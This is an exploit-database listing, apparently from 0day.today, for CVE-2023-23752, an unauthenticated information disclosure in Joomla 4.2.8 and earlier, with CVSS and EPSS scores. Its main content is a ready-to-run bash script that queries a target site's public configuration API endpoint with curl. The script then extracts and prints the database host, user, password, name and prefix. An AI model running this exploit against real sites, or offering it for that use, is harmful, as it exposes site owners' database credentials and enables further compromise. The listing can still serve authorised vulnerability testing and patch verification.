Joomla 4.2.8 Information Disclosure Exploit

2024-05-2200:00:00

d4t4s3c

0day.today

216

joomla

unauthenticated

information disclosure

exploit

cve-2023-23752

web application

linux

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

7.2 High

AI Score

Confidence

Low

0.949 High

EPSS

Percentile

99.3%

JSON

#!/bin/bash

# Exploit Title: Joomla! <= 4.2.8 - Unauthenticated Information Disclosure

# Date: 2024-05-21
# CVE: CVE-2023-23752
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.joomla.org
# Software Link: https://downloads.joomla.org
# Version: <= 4.2.8
# Tested on: Linux
# Category: Web Application

while getopts ":u:" arg; do
  case ${arg} in
    u) url=${OPTARG}; let parameter_counter+=1 ;;
  esac
done

if [ -z "${url}" ]; then
  echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
  echo -e "\n[-] Usage: CVE-2023-23752.sh -u <url>\n"
  exit 1
else
  echo -e "\n[*] Joomla! <= 4.2.8 - Unauthenticated Information Disclosure"
  curl --silent --insecure "${url}/api/index.php/v1/config/application?public=true" > out.tmp
  echo -e "\n[i] Database info:\n"
  echo -e "[+] DB Type: $(sed -E 's/.*"dbtype":"([^"]+)".*/\1/' out.tmp)"
  echo -e "[+] DB Host: $(sed -E 's/.*"host":"([^"]+)".*/\1/' out.tmp)"
  echo -e "\e[92m[+] DB User: $(sed -E 's/.*"user":"([^"]+)".*/\1/' out.tmp)\e[0m"
  echo -e "\e[92m[+] DB Password: $(sed -E 's/.*"password":"([^"]+)".*/\1/' out.tmp)\e[0m"
  echo -e "[+] DB Name: $(sed -E 's/.*"db":"([^"]+)".*/\1/' out.tmp)"
  echo -e "[+] DB Prefix: $(sed -E 's/.*"dbprefix":"([^"]+)".*/\1/' out.tmp)"
  echo -e "[+] DB Encryptation: $(sed -E 's/.*"dbencryption":([0-9]+).*/\1/' out.tmp)\n"
  exit 0
fi